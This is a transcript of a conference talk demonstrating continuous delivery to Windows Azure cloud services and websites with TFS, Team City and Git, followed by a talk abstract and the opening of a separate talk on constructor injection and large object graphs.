slot in order for it not to cost anything. And then you had to like mount it back if you wanted to launch it again. And that took some time. But now you just have to press the stop button and it's not costing you anything. So you could have a build server or something running in Azure, which you just stop when you go home at night with a script, with a simple PowerShell script, stop this virtual machine. The cloud services, now there was some Windows Azure users in the room. You've used cloud services, right? Most of you. Okay, I see some nodding. Yeah. So cloud services, that's where Microsoft started their journey to the cloud. That's the cloud for Microsoft from day one. Cloud service and a website. What's the difference between a Windows Azure cloud service and a Windows Azure website, anybody? 
The difference, well, the difference is that the website is a hosted environment where you deploy your website, too. But the cloud service is sort of like a virtual machine, but it's sort of just still taking care of by Microsoft, right? You don't have to run any patches on this thing and do any hot fixes or updates or empty logs or, you know, care for the machine like you would a virtual machine. If you run a virtual machine, you have to take care of it. But if you run a cloud service, all you need to focus on as a developer is building your code, building your business, creating your application and taking that application and the data to Windows Azure. Just deploy it there, have it run in that environment. And then, of course, you have a scenario where you don't have to care about the fact that it's running on a virtual machine that has an operating system that needs patching. All that is taken care of. And Microsoft started their journey to the cloud with this. And, of course, they realized that a lot of people really want and really need to have the virtual machines. So they've brought that along later. But they started here. And if you think about it, that's kind of difficult to do. You get full admin rights on these boxes. You can run scripts and PowerShell in full admin mode during the startup of these things. But automation is key here. You have to automate this because Microsoft will refresh your machines from now and then restart them. For instance, maybe take your machine down. It seems like this machine is behaving funny. We'll take it down and give you another instance. And when they give you another instance, they have to be able to rerun all of your automated, automated automation. Now, you can run, you can deploy to a cloud service, automated in Windows Azure. We're mostly going to talk about these guys today, the websites. But I have demo, I have a demo on the cloud service as well, if you want to see that. I'm going to let you guys decide which demos to run later because I have plenty of demos on this. I've been doing different talks on this and I have different types of demos. And we'll do the ones that you want to see. And if there's a demo that, excuse me, if there's a demo that we don't have time to do, you can ask me just outside the room and I'll show you personally the demo of whatever you want to see. Okay? The website is just hosting your website in a hosted environment. It's as simple as that. But seeing that, I still feel that I need to point something out, which is, I guess, kind of obvious, but still it needs to be said that it's not just hosting the website in Windows Azure because that's, I mean, you could do that anywhere. There's plenty of website hosters. You can just go to town and buy some hosting. Hosting on Windows Azure means that you are going to be very close to some very powerful, some very powerful other features like there's a powerful service bus there. There's a caching that, some caching mechanisms that you can take care of or take in use. And there is like security stuff with access control service and things like that. So there's like this whole portfolio of things that are near to your application, which you can take advantage of in Windows Azure. So that's sort of the actual real value for running production environments in Windows Azure, I think, because hosting a website, anybody could do that. Let's talk about beliefs just briefly. Microsoft has a belief. 
Microsoft believes that platform as a service provides the best foundation for creating, running and managing custom applications the best. Doesn't say that Microsoft believes that it's a good okay or fine foundation. It's the best one. Does that mean that they don't care for infrastructure as a service? Of course not. Of course it doesn't mean that. It means that if you can move your applications to a pass, a platform as a service experience, instead of running it as infrastructure as a service, then it's going to be better for you because you'll be able to focus on what's important for you. That's the thing. So this is a belief that they have. If you can move in that direction, do it. And if you think about it, you're not taking something away from the IT pros. There were no IT pros in the room, but you're not taking anything away from these guys. You're actually giving them a free pass of not having to deploy and manage an IaaS. If you think about it, you're gonna have to think about that for a while. Because it is easier to host and manage these applications that run on platform as a service than it is compared to hosting your own virtual machines. And these are all the, this is the first slide. I made it a little bit gray to make it look kind of old. This is the first slide of the different publishing methods that Microsoft created for Windows Azure websites when it was introduced. Now, Windows Azure website is not in production. It's still preview. Anybody could, you know, make their educated guess on what timeframe they have for going into production with that. It's very soon. That's what they say officially. It's going to be soon in general availability. And it just might be very soon. And very soon there's a conference in the US. So my guess, not Microsoft saying anything officially, my guess is that general availability will probably be in the build timeframe. So very soon, if that's true. So when they came up with it, they had these deployment methods. I'm not gonna show you FTP because, I mean, it's cute, but it's not really what we're here for. WebDeployer did, but that was just to get us a fresh site for our demos. And then they had Git and TFS. And quite quickly afterwards, they added support for integrating with Codeplex and Bitbucket and GitHub. And on Bitbucket and Codeplex, you can also use if you want Mercurial or Git. And on GitHub, I guess, Git. Those are the supported methods of using it. And TFS, in this case, stands for Team Foundation Service, the hosted TFS. Now, it's possible to do these things from the Team Foundation server, which you might have. Anybody have Team Foundation server? A few, yes. It's totally possible to use that, but you have to set it up yourself. There's really no public supported method of, here's how you do it currently. But I'm sure there will be at some point, it's just that Microsoft hasn't gotten around to it yet. And also, I have this custom secret version that I'd like to show you guys if you want to. But now, I mean, now things have gone completely bonkers. Now you have lots of other methods to use as well. And I guess you have the Team, you have the Visual Studio there, the Team Foundation Service and the Bitbucket thing. You can use Bitbucket or Dropbox, I mean, you can use Dropbox to deploy to Windows Azure. That's kind of cool. And some of you might be wondering why I'm using a laser pen right now. It's actually quite silly. Laser pens are good for one thing, really. That's what they're good for, for playing with your dog. 
So I'm not going to do that anymore. Sorry, I just wanted to point that out. Don't ever use laser pointers. Supported publishing methods for Azure are all of these. So you could use your own Git repository if you have one, your own external repository that you use. You could use your local Git repository in your local box. And you could use all of these other services, you know, pick one. And you can still do also your own custom version. Anybody have any questions so far? Yes? What happened to Subversion? Yeah, I haven't heard anybody say anything about Subversion for using that with Windows Azure. I suppose it's possible to do. I'm sorry, man. Subversion is not up there. I think you may be the first one who's ever asked me this. I applaud you for it, and I agree. It should be up there, but it's not. Put that in the custom box, but I don't have anything that I can show you today. Damn, I have to go create a new demo. Okay. Love the question. I love the question. And so here are all the demos. Now, the rest of this talk, we have plenty of time. I'm going to show you guys demos, right? I actually have a little bit of a wrap up in the end, but I can show you guys, you know, any demo you like. The first one up there is on the cloud service, right? And then I have a bunch of them on websites, and the content delivery using Team Foundation Server one is more of a conversation, really. I can point you to how you would go about setting that up. And I actually do have a Team Foundation Server at the office, but I haven't set that up myself, but I know how to do it. It's not impossible to do. You have to sort of go in and change the scripts yourself. So, you guys, it's up to you. Which do you prefer to see? Anybody? Cloud service? You want to see the cloud service one? Is that okay? Okay, sure. Let's do the cloud service one. So, I guess since you have been using Windows Azure for a while, cloud service would be cool for you. Okay, good. Let's see now the cloud service. Yes, that's a separate demo. In fact, I'll start from the portal on this one, and the portal is there. So, we need now a, we could use this NDC one. No, we need to use the cloud service one. I wasn't prepared for that one. Cool. I thought you were going to go with a website one. I'm happy that you went with the cloud service. So, we'll create ourselves a new cloud service. Do you think NDC? No, it's not. NDC Oslo, that's available. And let's not put that in Southeast Asia, let's use North Europe. So, create ourselves a new cloud service. And I have here on disk, I have a folder which we're going to use. It's in the demos. Here's my cloud service, TFS service demo folder. In fact, let's do this. Let's go fresh. So, there's nothing in here. We'll use this URL. And I have by now, yes, I have the NDC Oslo site ready to go. There's nothing in there now. Nothing is deployed, right? If we want to set up continuous delivery using this, you go to click in on the site and you use integrate source control, set up TFS publishing. That's the one which is supported for cloud services right now. With the websites you can do GitHub and all other kinds of things, but here you need to do TFS. And I have this. This is my TFS service, my personal one. We have one for the company, but this is my personal one. I have to go in and say authorize. And I have in there already, authorization process is a one time thing where you connect. And I have in there cloud service continuous delivery demo. I think it's the one. So, I'll connect up to the cloud service. 
Let's see that I make sure that it's cloud service continuous delivery demo. Okay. We've got to remember that I have a lot of different demos in there. So, I'll just connect this up and set it up so that I have my code in there. In fact, maybe I did a mistake now because let's go to my Visual Studio. This is my team foundation service, right? This is where I keep my projects. And I think it's going to be better for us if I just create a new one. Let's do NBC cloud service. You'll probably have your code already in there, but we'll create a new one. It's quite fast. And we'll hook it up to that one instead. I'll just go in and remove the mapping in here. You have to go to the little cloud and disconnect from TFS again. So, it's actually quite quickly, quick to do this. By now, I guess, I'm still creating. This usually is quite quickly quick to do. Creating the team project. I want to make sure I refresh this. And now it's created. Cool. So, we'll use the one with the NDC in the name so we know that we have an empty one. I want to show you from the top, not deploy something that I've already prepared. Now, let's set up TFS Publishing with a new one. That's better. Accept. And then we picked the NDC cloud service one, which I just created. That's the one. Cool. Linking. So, now we have that. And now we're going to go to Visual Studio. And we'll use this website that I have here. And let's just change the text on it, right? This is, this site is deployed using TFS and cloud services. Cool. Let's use that. So, this guy now needs to be published. So, I need to connect up to my Team Foundation server project and make sure that we get the cloud service, NDC cloud service, right? We need to map that down to our local drive to make sure that we can check in some code. So, we'll map that down to our local drive. Oh, that's, oh, it's already, it's already mapped. Let's do two then. Map. Because I've done this demo before. This folder name was already in use in my mappings. So, let's just do a two one because I have a new folder here. All right. That's it. And then I have my website. So, I'll copy my website in. You probably already have stuff in your source control. But here's a full, full website that I'm just copying into that folder which I've mapped to. So, again, this is my repository in the Team Foundation service. And it's mapped to my website, my cloud service in Windows Asher. So far so good. I'm going to copy all of this stuff in. And then we're going to go and open up the solution. That's a browse to it. And it's that one, right? I'm just copying. I'm done soon. Because I have all the NuGet packages and stuff on my local drive. So, that's why it was quite a bit of stuff in there. So, here's my, here's my site now. My code. This would be your code. And what we're going to do, of course, is look here on the site when it says right here, TFS will build your project and deploy it to Windows Asher on your next check-in. So, we're going to have to go and do a check-in because we haven't checked anything in and it's hasn't done anything. It's just synced up for the first time. But now we've got to go and, and, and launch this baby and make it do what it's supposed to do. Just going to have to wait for the project program to respond. Any questions so far? Yes, sir? That is correct. Yes. That's, that is correct. Good question. Automatically, you get a production and a staging slot for cloud services. Most of you probably know this, but yes, that is the scenario for the cloud services. 
So, it's used for a deployment scenario where, where you do what is called a VIP swap. And it means that you have your code and you have your application in production. What you do is then you deploy the new version to staging and they're just side by side. The new version you can browse to it, it gets like a, a, a GUID based URI. You can browse to it and test it and see that it's okay. And then you say swap. And then what happens is that the load balancer will swap virtual IP addresses inside of the load balancer and say that this should go through that and that should go through this. And then you're, instantaneously, your staging site will be in production. And vice versa. That's what it's used for. Awesome question. Keep them coming if you have them. Your questions are the most important thing in here today. So, we need to, of course, add our code, add items to the folder. We'll just go ahead and add everything except for the packages. We don't need those. And the build process templates are also already added. So, we really don't need that either. We'll just go and add all of this. I've set this up. Why I'm not adding the NuGet packages is because I've set this up to use this enable the NuGet package restore thing. So, if, if you build your code and the NuGet package is not present, it's going to be automatically downloaded. And that happens also on the build server. So, you don't have to check in all your NuGet packages on the build server. I think that's a good thing. I don't think that you should check in stuff like that. All right. So, now we have our code. This is a website. I can actually can't launch it. I'll have to go and, oh, wait a minute. I do have it in admin mode. So, I could launch it locally, but I don't see the point. It's just a website right here. And a test project. And our little cloud service right there with a web role in it. That's, that's all we have. So, it's a very simple project. But what we need to do now, of course, is to check this in. And we'll do pending changes. And check in. Initial blah, blah. Everybody writes initial commit or something like that. Yeah. Initial blah, blah. So, we'll check in the initial blah, blah to the server. Cool. And what's going to happen now? Anybody know? What's happening right now? We're checking in. Well, I guess we're not done yet. All right. It's a big check in. It's successfully checked in. All right, cool. So, right now we're going off to our project. The new one we created, the build server is kicking in right now. And it might have already queued up. Yes, there it is. It's already queued up a build. So, what I get out of the box when I say, connect this cloud service to the team foundation service. What I get out of the box is this continuous delivery deployment script. It's right there on the left. On the far left, it says, NDC Oslo underscore CD, right there. So, I get out of the box a setup for deploying this stuff. And it's running right now. And this is actually going to take a while because what it has to do is it has to do several things. It has to get all the code, put it on the build agent, build it, run the tests, and so forth. And then it's going to, after that, it's going to go ahead and deploy. And deploying to Windows Azure is no longer a 20-minute process, right? It's more of a six, seven-minute process. But still, it's going to be a six, seven-minute thing that's going to happen here. So, I think that maybe we shouldn't wait around for it, just stand here in small talk. 
We should just go ahead and do another demo while this thing happens. And I'll show you the result, okay? So, we'll just leave that running and go back to the slide. But that is how easy it is to set up. I mean, it's out of the box, it's default behavior. And you can if you want to. Maybe I should show that. You can if you want to. And that sort of speaks to the how do I use my own team foundation server scenario as well. You can use your own team foundation server because you can edit the build process templates on these things. And let's see, it's under builds, right? Let's go to home. All right, I have to be connected to my specific team project. And we want to have cloud service. It's the one, NDC one, that one. So, we want to have that. And now, we'll go to builds. And we see, it's the same as always, we see that we have the NDC Oslo underscore CD, that's continuous delivery or continuous deployment, I think it's Microsoft's term here. That's the build process template that we get. And we can go in and edit the build definition and make changes to it. Completely possible. And many of the same things that are available for you today using team team foundation server are also available here. I bet if we go into the nitty-gritty, there may be some settings in here that are not available. Okay? So, I bet that's true. Also here, the build process template that we're using, it says here, Azure continuous deployment something and so forth. And that template is available to you. It was downloaded as part of the source code. It's right in here. So, the templates, all of that stuff is in there. If you have a good team foundation server guy, I'm sure he or she can figure this out and set it up from your team foundation server so that you can do the same. But of course, Microsoft is, I guess, prioritizing as hard as they can. And right now, they're pushed this stuff already out into like this out of the box experience into the team foundation service. Right? And you can emulate this on your local stuff if you want to. Let me just make sure, let me just switch back to the build. Oh no! What happened, Magnus? It's not working. Sorry, I'm just being silly. So, something is not working here. What is that? Hmm. It seems like it's compiled and it's, gives us an error message and hmm. Yeah, one error. Let's go to the site and see. So, we're not going to get this deployed into production. It's actually going to be deployed into the staging slot. And it says that the deployment failed because the default behavior is not to go to production. It goes to staging. And we have this deployment thing that we launched and it failed. And it's, the good thing is that it shows up here in the portal. You can go in and check and see, oh, wait a minute, I didn't get deployed. I wonder why. So, we can go into the log and that actually brings us all the way back to the log here. And, and we can see that. Let's see now. I can't actually see the details here. So, we need to go into the log and see. That's interesting. Thank you, sir. You couldn't find the Nougat stuff. That's because when I did add, right? That's not the, this, actually, this is not the error that I was looking for. This is not the droid you're looking for. But if you go add items to folder and you check on the Nougat thing, you have to make sure to get this in there, right? Because it does, by default, it doesn't include XC files, right? So, you specifically have to say, no, no, no, I don't want that excluded. I need that included. Okay? 
So, you need to make sure that you get all the right stuff in there. But that was actually not the error that I was looking for. That was why I was a little bit confused. I was looking for this. My, my failing test. But now I'm not going to redo it again and show you that, oh, my god, the unit test is failing. This will fail the build and it will stop the deployment. So, I will now do this to make sure that our test runs, just to make sure that we won't get another build fail here. We'll go back and take our pending changes, our addition of the NuGet.exe and the tests. You know what the NuGet.exe does, right? Or don't you? Anybody who doesn't know? That's okay. I mean, the NuGet.exe is the little executable that makes sure that you can do this package restore thing on your NuGet packages. You have to check that in so the build server can reach it. Fixed NuGet.exe and the test. It's actually a good check-in comment because I only have one test. So, it's that test. So, we'll check that in and that'll of course fire off a new build and, and then it should, this time it should work. But again, it's going to go back and redo this process again. So, we've got a new build queued here and it's going to take a while and so forth. All right? Any more questions? I like how the, the Team Foundation Service, yes sir, a question. Do I have a demo for Team City? I don't know. Did anybody tell you to ask that question? Well, I might show you a demo on Team City and I love the question and you've totally given away all my, half of my talk and I, I love you for that. It's the no Microsoft one. No, no Microsoft in this instance, of course, doesn't mean do not use Microsoft stuff. It means not only Microsoft tools can be used, you know, Team Foundation Service and Team Foundation Server and stuff like that. You can also use Team City. I might show you that demo now, should I? And it's an awesome question and I love you for it. You actually blew away a part of my presentation and that's great. So, the no Microsoft demo is that demo. Let's have this guy run and, and see, make sure that it works now and so forth, right? Is it working? And so, there's the failed build right there and there's the new build right there and in here you can do all the, all those sorts of things, also set up users and stuff like that. But if you're not using Team Foundation Service and if you're not using Team Foundation Server, you might be using something else. And, and this is not set up for cloud services, though, it's set up for websites. You can do it for cloud services. It's not, there's not a lot of difference. It's perfectly possible to do, but I've set it up for websites and it's the some other demo, demo. Right? The some other demo, demo is a, we browse to it and it's right there. So, it's using some secret deployment method, which we now know is not very secret. I'm going to show you what deployment method we're using by doing actually another demo while I'm in here. If you click into configuration here and scroll down, you see that I'm hooked up to Git. Okay. I'm hooked up, hooked up to a Git repository. And if you keep scrolling down, you get app settings and connection strings. Now what you can do with app settings and connection strings for Windows Azure websites is that you can enter values here. We have one here. It's the disclose deployment method setting and it's set to false. Let's flip that over to true.
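For reference, reading that setting from code is just an ordinary ConfigurationManager call; a minimal sketch of the idea — the key name matches the demo's setting, but the surrounding class is an assumption, not code from the talk:

    using System.Configuration;

    public static class DeploymentInfo
    {
        public static bool DiscloseDeploymentMethod
        {
            get
            {
                // Locally this reads web.config; on a Windows Azure website the value
                // entered under "app settings" in the portal silently overrides it.
                var raw = ConfigurationManager.AppSettings["DiscloseDeploymentMethod"];

                bool disclose;
                return bool.TryParse(raw, out disclose) && disclose;
            }
        }
    }

The same interception applies to connection strings, which is why developers can keep harmless dev values in source control while the portal supplies the live ones.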
And also at the same time, we're going to go over to our solution, some other demo, and show you that the app settings here are overridden. So, when you call ConfigurationManager.AppSettings or .ConnectionStrings, that'll actually get intercepted and overridden and it'll read these values from the portal. And that's really good because then you can have your developers, they can have their dev settings, all whatever settings they like, but you just override them in the portal and they might not even have the ability to connect to the live database. So they can't make a mistake because they don't need to connect to the live database. They only need the dev database. So you can override that and it's really powerful. And in Visual Studio, I have some other demo web and it has the same setting in there. The app setting, disclose deployment method, and it's set to false and that's the stuff that we get deployed. So I'll just set it to true and save and it's already changed and I'll go back and refresh. I'll go back and refresh. And as it refreshes, you get Team City. If you want to set this up, if you want to do it, you might wonder where to run it. So sure, you can run your own Team City on premises and use the stuff that you usually do, but I actually have one running here. I'm running it in Windows Azure. So I have one which is running right now. I'll copy the URL for it and browse to it and it's right there. So this is my Team City running in Windows Azure. I wanted to show you that because I wanted to draw your attention to the world's longest blog post. It might be. It's very long anyway. Continuous delivery on Windows Azure, not only Microsoft style, with Team City. It's on my blog. You can go to that and it's like, it's a mile long. Now, the reason I show you this is not to draw attention specifically to my blog, but this is the blog post you need to do this. If you want to set it up on a virtual machine in Windows Azure, do it yourself. This is the blog post that you need to do it. And also the point here is, if you're not using the Microsoft way and using their built-in out of the box experiences, which you set up in like 30 seconds, then you're going to have to do it your own way. And it's going to be painful and it's going to be an ordeal and so forth because you don't have any support for it. And when you're done, you get something that actually works. So I'll just leave that right there. And I have the website here. So we'll go ahead and make a change to it because we're now using Git. We're going to have to get our Git shell set up. So I'm using Git for this. You can use whatever version control you use, but I'm using Git. And we'll go to demos, some other demo. Actually, there is a change in there. But just to make sure, I'll make a change. We'll make one more change. I'll say it's the new version of the site. So I made some changes. There's two changes now. Cool. And what you need to do now is git add, or I can actually just do the git commit. Git commit with a message, testing. Okay. So where am I pushing this? Well, I'm pushing it. It's git remote -v to show you that yes, I'm pushing this to a repository I have over in GitHub. And it's the only source that I have. So I can just simply say git push because there's only one place to push it. And I'll push it there. So now I'm pushing my changes into GitHub. Are you using GitHub? Using Bitbucket with Git or Mercurial? I think that'll work the same.
But you'll have to set your Team City server up for using Mercurial, which I guess you already have. So that's a cool option. I didn't have a specific demo for that. But it works the same, right? It's very similar. So now push that code away. And in a little second or two, this guy is going to pick it up and build it and do the deployment. Now you have to be careful there. You have to go in and tweak this and set it up. And it's kind of, before you're there, it's going to take you a while. Are you using cloud services or websites? All right, right. So but you have a web application? All right. But yeah, yeah, yeah, yeah, sure. Sure. So now you see it's picking the build up and I have two build steps there. One is, one is take all the code and build it and test it and do all that. And it's actually going to fail because I, again, I wanted to show you that I have not only Microsoft style here, I have a unit test in here as well. But it's not, it's not Microsoft Test, it's NUnit. Okay. So because I have full control of my environment now, I can use whatever testing framework I like. If I want to use this testing framework, I'll do that. And again, I'll need to go back and fix the test. And then I'll go ahead and do another push, right? So we're going to have to do it one more time. I wanted to show you that of course I can, since I take, I take full responsibility now, I take full control of this thing. I'm going to have to do everything on my own, but you can totally do it. And in the end, it's going to be worth it. Of course, it's worth it to set up automated stuff. So this is going to run through now and it's going to deploy. It's going to push back the website to the live environment. Now, this I guess is a good time to show you a little, to give you a little history lesson. Yes, sir. Question? That's correct. That is an awesome question. My God, you're ahead of me: at the end of this build, are we just pushing that into the Git repository in Azure? You are correct, sir. That is, I applaud you for that because that's actually exactly what I was going to show you. You guys are ahead of me. That's brilliant. I love the interaction here. You guys, so yes, you can do it two ways. You can use web deploy from here and do web deploy to your Windows Azure website. I showed you web deploy as my first demo. That's perfectly possible to do, right? But you could also push to the Git repository in Azure. If you set up a website with a Git repository, you can use that. That is actually what happens when you integrate with Git. You get a Git repository set up in Windows Azure and then you push your code and it can go straight to that. Why would you want to do that? Well, compared to using web deploy, web deploy is easier, right? Yes. You do get history of your builds and your deployments inside of your Team City server and inside of your Team Foundation Service as well. You can go back to those and relaunch an older build. But there's a reason why you don't want to do that. It's because the portal comes with a built-in version history. So this is now deployed. My new change is now deployed. And if I go now to my website, it's the some other demo website, I have a bunch of deployments because this has been around for a while now. And I have this deployment history here inside of the, there it is. So I have the active deployment right there. And if we browse to it and refresh, let's see that it's the new, there you got it, right? It's the new version of the site. Okay.
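The unit test that gates the deployment is just an ordinary NUnit test; a minimal, made-up example of the idea — the fixture, method and values are illustrative only, not the code from the demo:

    using NUnit.Framework;

    [TestFixture]
    public class DeploymentGateTests
    {
        // If this assertion goes red, the build step fails and the deploy step
        // never runs, so the broken change never reaches the live site.
        [Test]
        public void NewVersionTextIsWhatWeExpect()
        {
            var expected = "It's the new version of the site.";
            var actual = "It's the new version of the site."; // imagine this read from the page under test

            Assert.AreEqual(expected, actual);
        }
    }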
That's the version that I pushed from, from my machine into Team City and it's now deployed. If I click back to the previous version that I did, I actually did that thing this morning as I was going through these demos and I go back and I say redeploy. Yes, I want to redeploy. It's now deploying the old version of my site. Into live production, there is zero downtime and it's already deployed and I can go refresh here and it says the old version. Okay. So I get a version history inside of Azure. So it keeps around a set of, of older deployments for you, which means that if you go from your dev box into live production and there's a problem, somebody's on the phone screaming at you, what the hell? What did you, sorry, what the bleeding, something really bad. Then you can just simply go and redeploy the old version. It's done in seconds. Okay. Yes. What happens if someone's already logged on if you have like an authentication system? Yeah. It's there. It's, it's, there's no downtime and nothing happens. What they do under the cover stairs, they move the virtual path from one directory to another. There's no, there's no reset of your application or anything. They're all still in there and everything just works and it's really cool. So it's, it's so fast that I, I'm just going to do it again. That's how fast it is. So this is, this is one thing which could make you consider go to dev to production because it's that fast. It's already done and it's, it's very stable and useful. So if I had from the team city server, which I did in my first version of this demo, used web deploy to, to publish, I wouldn't get this history stuff. I would only get the current deployed site. So which is why I did exactly what you said, sir, in the back row. I did the from the team city build. Once it's built and tested and it's all good to deploy, it uses git push to push the thing into Azure because then you get the version history in Azure. Any other really good questions because your questions are awesome. Yes. Well, no. The version history to my knowledge can use other things than get for the, for the deploy part, right? To deploy to Azure. As far as I know, support is currently for git and for team foundation service. You can, you get the same history stuff with using the team foundation service and, and git. But I, I haven't tried mercurial, which is a good thing. I need to test that. I'll test it and get back to you. And it's, it's very, you can send me an email and I will definitely, I will definitely get back in touch with you on that. That's important. To test if Microsoft have, have already put up, I bet they will, but if they already have put up the, the integration with, with version history for mercurial, that's, I suppose what you're asking for. Yes, mercurial. Good question. Guys, we have less than five minutes left. I've shown you a bunch of demos. Of course, I have a lot of demos left. Let's go back to the, the team city one just to make sure that it's, it's okay now. There you go. The NDC cloud service that we deployed, it went into production and it's a cloud service. No, not a virtual machine Magnus, a cloud service. Yes. There is the NDC Oslo and we have staging, staging running with a, oh, it's running with a nice, with a nice check mark. And now staging is running and I can go to staging. I can browse to it. There you go. There's the GUI based URL, which you can use for testing and make sure that your environment is now up and running. 
That's actually says this site is old, but it depends on what code I put in my repository. And then I can do staging production still doesn't have anything in it. So what I want to do now is of course swap this thing into production, swapping the deployment in cloud service NDC Oslo. And now we're going to swap the staging environment into production. Takes a few seconds. Your deployments are being VIP swapped. All right. So that's, that's going to put the site into production. But you see from, from like me checking in the code to team, team foundation service, it built and deployed everything into a now live running environment. And now it's live. So now if I go to this URL, now this site is live. The NDC Oslo one is live. And the other one should if I get my browser to refresh. It still believes that's the old one. It's not there. Refresh. Anyway, point is that it's now, it's got one deployment in of this thing and it's in live production. Okay. So staging is empty and production is running. Okay. So that was that. We have a couple of more minutes. I have time for a few more questions. And I want to show you also, of course, continuous delivery is extremely important. You got to do it. If you're not using it, wait, there's more. I just want to not be the sales guy, but quickly show you that Visual Studio is free. All of the SDKs and all of the coding that you ever want to do, whichever flavor you have, is there available. All of those SDKs and all of those tooling is open source on, on GitHub. And you just go in and click some, try it out. It used to look like this, but now, nowadays, to try, try Windows Azure for free looks like that. You get like a credit of, of dollars every month, right? You click in there and you activate your benefits. First of all, people activate your MSDN benefits for Windows Azure because you run for free in, in Azure because you get a monthly quote. Like if you have the smallest MSDN, you get 50 bucks. The bigger one is, is 100 bucks. The, the ultimate is 150 bucks of free usage every month, which you can use on any Windows Azure service, anyone you want to use. And it's really is for free. And it really is also so that it has a limit. So when you reach that ceiling, it's going to shut down for the month. And you get the next month, you're going to get it back again. You can start from zero again. So you really need to do this. And also the team foundation service is five users up to five users for free for now and forever. And so if you have a startup team, this is going to, you get the full benefit of the team foundation service for free. And this is you. Once you win the Aston Martin, that's important. Remember that. All right. That's what's, that was all of my slides. I wanted to make sure to show you the path to go down if you want to. I, we're out of time. You have any more questions? We have time for that. So I hope that this was a useful session for you. I hope this showed you that if you don't use this, then you're, you're basically robbing yourselves of a free testing environment. So thank you guys for coming. It was a pleasure to talk to you guys today.
|
Ever felt you spend more time packing deployments, configuring test environments and deploying the latest build, in order to please the testers, than you spend writing actual code? Had your flow interrupted by the boss wanting a demo environment set up for a customer demo? We simply can't be interrupted in our creational flow of #awesome code by the worldly dealings of these simpletons! Fortunately, built into the Windows Azure Platform, there is great support for Continuous Delivery of the greatness you just built. With little fuss you can set up automated builds, test runs and deployments so that you may focus on what’s important – the uninterrupted development experience. Everything that can be automated must be automated!
|
10.5446/51472 (DOI)
|
All right, seems like time's up. So hello, everyone. Hoping that you're having a good conference so far, last day of the conference. So this talk is called Big Object Graphs Up Front, as you can probably tell. When I made this slide, I apparently thought it was much more important to put my Twitter handle up there, so there you have it, but my name is actually Mark Seemann. So this talk is a talk that relates to loosely coupled code. So some of you will know this as dependency injection or inversion of control. So I'm also the author of a book called Dependency Injection in .NET, but I'm going to talk about things that relate to dependency injection or inversion of control, but I'm just going to call it loosely coupled code and contrast that with tightly coupled code. So that's the theme for today. And this is not an introduction to writing loosely coupled code. I expect that you've seen a little bit of programming to interfaces and stuff like that before. So this dives into specific aspects of writing loosely coupled code and geeks out on that. So it's a kind of a very specialized talk, but I think it's important because it addresses problems that people tend to have. So the purpose of this talk is to dispel fear, uncertainty, and doubt, because what happens is that when people start to grok what dependency injection or loosely coupled code in general is all about, what happens is that they become very uneasy. And one of the things they become very uneasy about is that when you realize that writing loosely coupled code is all about writing code in a way so that you construct a rather big object graph up front and then you go and party on that, that tends to scare some people away. So that's just my very brief introduction to this. So I'll get back to exactly what that actually means. So the agenda here today is I will talk a little bit. I will just give you a brief introduction about constructor injection and writing loosely coupled code and this thing called a composition root, which is where we talk about big object graphs up front. So the reason why I'm saying big object graphs up front is just because I thought it sounded funny, kind of like big design up front, but it's actually not related to that at all. It's just this concept of creating one big object graph and then letting it do whatever it's supposed to do. I'm going to spend a little time with that and then I'll address some of the concerns that most people actually seem to have and they fall into two categories, a concern about composition speed and a concern about memory footprint. So I'll talk for maybe a quarter of an hour and then I'll dive in and write a lot of code. So I'll write lots of different variations of a graph to see what it actually means to create an object graph up front. So that's the plan. So constructor injection, just a very, very brief recap. The idea about writing loosely coupled code is that if you have a class like this Foo class here, apparently it looks like this Foo class requires an instance of IBar, which is an interface, and I've left out all the actual implementation code here just to focus on the constructor. But you can imagine that the Foo class has a method that does something that actually requires the presence of IBar to actually work as intended. So IBar is an invariant of Foo, meaning that Foo does not work without IBar.
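In C#, the class being described is presumably along these lines — the bodies were not shown on the slide, so this is only a sketch:

    public interface IBar { }

    public class Foo
    {
        private readonly IBar bar;

        // IBar is an invariant of Foo: there is no legal way to create a Foo without one.
        public Foo(IBar bar)
        {
            this.bar = bar;
        }

        // Members that actually use this.bar go here.
    }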
And the way we do that when we work with constructor injection is that we say, well, we'll just have one single constructor of Foo that requires IBar as a constructor argument. So there is no normal, legal way of creating an instance of Foo unless you pass it an IBar. You can pass in null, and I'll get back to that in a little while. That is also illegal. There is really no legal way of creating Foo without passing in an IBar. So it's very apparent to anyone who looks at this class that it requires IBar. So now we have another class called Bar that implements IBar. You can tell it's the same story. It requires IBaz in order to work. So it has a constructor that actually takes in IBaz. So creating a Foo instance might look something like this. So this does not really seem to concern most people. So you create a new Foo, pass in a new Bar, and then you have some sort of concrete Baz instance that implements IBaz. This does not concern most of you, I guess. But what about this? Is this scary? This tends to scare people. I don't know exactly when it happens, where you go from being not scared to being scared. So don't worry about all the strange names. If you look up something called metasyntactic variables on Wikipedia, you will just see that this is all this foo, bar, baz thing just continuing on. So I didn't come up with these names. I actually just took them from the list. Anyways, so you can imagine that instead of being Foo and Bar and so on, this is actually your controller that has your dependencies, that has your loggers and blah blah blah injected. So this is just dependency injection in action. But I'm just keeping it general in order to not let the noise actually confuse you. So now you're just confused by the strange names anyway. So I can't win here. Anyways, this actually tends to concern lots of people because this just sort of looks scary. This looks complicated. It's really not. It's just a tree, right? Nothing special about it. We could generalize this to say this is a graph. If we reuse some of the things, it's actually a directed acyclic graph. But let's just keep it as a tree. Alright, so what people tend to do instead is something called bastard injection. And I think this is an anti-pattern, but I see this a lot. So because this scares people, they say, well, let's make a decision. I think this is a premature decision. But let's make a decision on saying, well, we'll have a default constructor of Baz and we can have another constructor overload that actually takes IQux as input, but we'll have this default constructor that then passes in the real Qux. And there's all sorts of problems with this. And one of the problems is that if this real Qux default instance is defined in a different library, you're actually pulling a dependency on that library, which will probably not leave you in a good place. So if any of you saw Robert C. Martin's talk on Wednesday about component design, he actually talked about dependency graphs. So this is bad because it will probably give you a bad dependency graph. The other problem it will give you is you make your decision too early. So you're back to this scenario where it looks like you have a small shallow object graph. But really, what you did was just to make a decision on what's going to happen beneath that Baz instance, and now you can't change your mind. So that's not very flexible. So you're making this decision at compile time as you write your code.
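A hedged sketch of the bastard injection anti-pattern just described — the exact members weren't shown, and the interface and class names follow the metasyntactic list, but the shape of the two constructors is the point:

    public interface IBaz { }
    public interface IQux { }
    public class Qux : IQux { }

    public class Baz : IBaz
    {
        private readonly IQux qux;

        // The "bastard" default constructor: it news up a concrete Qux, possibly
        // defined in another library, so the composition decision is made at compile time.
        public Baz()
            : this(new Qux())
        {
        }

        // The overload you would actually want to keep.
        public Baz(IQux qux)
        {
            this.qux = qux;
        }
    }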
